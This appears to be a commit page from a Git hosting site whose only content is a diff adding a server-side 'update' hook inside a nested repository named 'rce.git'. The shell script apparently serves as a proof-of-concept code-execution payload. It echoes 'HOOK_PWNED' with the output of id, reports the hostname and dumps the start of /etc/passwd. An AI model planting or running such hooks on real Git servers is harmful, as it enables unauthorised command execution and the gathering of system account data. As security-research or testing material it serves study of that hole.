x 1 день тому
батько
коміт
46006e94ae
1 змінених файлів з 5 додано та 0 видалено
  1. 5 0
      nested/rce.git/hooks/update

+ 5 - 0
nested/rce.git/hooks/update

@@ -0,0 +1,5 @@
+#!/bin/sh
+echo "HOOK_PWNED:$(id)" >&2
+echo "HOST:$(hostname)" >&2
+cat /etc/passwd | head -5 >&2
+exit 0